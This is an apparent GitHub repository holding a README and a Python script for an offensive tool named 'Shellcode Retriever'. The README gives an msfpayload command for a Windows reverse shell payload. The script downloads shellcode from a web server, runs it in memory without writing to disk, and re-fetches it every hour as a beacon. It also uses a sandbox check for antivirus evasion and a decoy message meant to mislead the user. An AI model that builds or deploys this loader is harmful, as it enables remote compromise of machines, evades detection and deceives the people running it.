├── README.md └── shellcode_retriever.py /README.md: -------------------------------------------------------------------------------- 1 | ##Shellcode Retriever 2 | Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html) 3 | 4 | Demo: 5 | 6 | http://www.youtube.com/watch?v=R15B2p-uWKY 7 | 8 | --- 9 | 10 | For use by IT Security professionals and researchers. 11 | 12 | Usage: 13 | 14 | Create shellcode using the following msfpayload command: 15 | 16 | msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt 17 | 18 | Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code. 19 | 20 | Upload the shellcode to your webserver. 21 | 22 | Compile the python code to an executeable by using pyinstaller. 23 | 24 | 25 | --- 26 | 27 | ##License: GPLv3 28 | 29 | 30 | Shellcode Retriever 31 | 32 | Author Joshua Pitts the.midnite.runr 'at' gmail com 33 | 34 | Copyright (C) 2013, Joshua Pitts 35 | 36 | License: GPLv3 37 | 38 | This program is free software: you can redistribute it and/or modify 39 | it under the terms of the GNU General Public License as published by 40 | the Free Software Foundation, either version 3 of the License, or 41 | (at your option) any later version. 42 | 43 | This program is distributed in the hope that it will be useful, 44 | but WITHOUT ANY WARRANTY; without even the implied warranty of 45 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 46 | GNU General Public License for more details. 47 | 48 | See for a copy of the GNU General 49 | Public License 50 | 51 | This program is to be used for only legal activities by IT security 52 | professionals and researchers. Author not responsible for malicious 53 | uses. -------------------------------------------------------------------------------- /shellcode_retriever.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | Shellcode Retriever 4 | 5 | Author Joshua Pitts the.midnite.runr 'at' gmail com 6 | 7 | Copyright (C) 2013, Joshua Pitts 8 | 9 | License: GPLv3 10 | 11 | This program is free software: you can redistribute it and/or modify 12 | it under the terms of the GNU General Public License as published by 13 | the Free Software Foundation, either version 3 of the License, or 14 | (at your option) any later version. 15 | 16 | This program is distributed in the hope that it will be useful, 17 | but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | GNU General Public License for more details. 20 | 21 | See for a copy of the GNU General 22 | Public License 23 | 24 | This program is to be used for only legal activities by IT security 25 | professionals and researchers. Author not responsible for malicious 26 | uses. 27 | 28 | ''' 29 | 30 | import socket 31 | import sys 32 | import urllib2 33 | import ctypes 34 | import time 35 | import signal 36 | 37 | 38 | #Set to True if you want to beacon every X seconds based 39 | #on timesleep 40 | retry = True 41 | #time to sleep in seconds 42 | timesleep = 3600 43 | opener = urllib2.build_opener() 44 | 45 | 46 | def sandbox_check(): 47 | """ 48 | Quick sandbox check for additional av evasion. 49 | And a message to throw the user off. 50 | """ 51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | sandbox = True 53 | try: 54 | s.connect(('127.0.0.1', 445)) 55 | s.close() 56 | sandbox = False 57 | except: 58 | pass 59 | 60 | if sandbox == True: 61 | try: 62 | s.connect(('127.0.0.1', 135)) 63 | s.close() 64 | except: 65 | #Message to throw the user off: 66 | print "Clybase platform checker 2012\nYour platform is:", sys.platform 67 | sys.exit(0) 68 | 69 | 70 | def allocate_exe(shellcode): 71 | """ 72 | ctypes VritualAlloc, MoveMem, and CreateThread 73 | From http://www.debasish.in/2012_04_01_archive.html 74 | """ 75 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 76 | ctypes.c_int(len(shellcode)), 77 | ctypes.c_int(0x3000), 78 | ctypes.c_int(0x40)) 79 | 80 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 81 | 82 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), 83 | buf, 84 | ctypes.c_int(len(shellcode))) 85 | 86 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), 87 | ctypes.c_int(0), 88 | ctypes.c_int(ptr), 89 | ctypes.c_int(0), 90 | ctypes.c_int(0), 91 | ctypes.pointer(ctypes.c_int(0))) 92 | 93 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 94 | 95 | 96 | def get_and_execute(openurl): 97 | info = opener.open(openurl) 98 | shellcode = info.read() 99 | shellcode = bytearray(shellcode) 100 | allocate_exe(shellcode) 101 | 102 | 103 | def main(): 104 | sandbox_check() 105 | #set a url below or leave as '' to manually enter 106 | openurl = '' 107 | if openurl == '': 108 | openurl = raw_input("Give me a url: ") 109 | try: 110 | get_and_execute(openurl) 111 | while retry is True: 112 | time.sleep(timesleep) 113 | get_and_execute(openurl) 114 | 115 | except Exception, e: 116 | #print str(e) 117 | pass 118 | 119 | if __name__ == "__main__": 120 | main() 121 | --------------------------------------------------------------------------------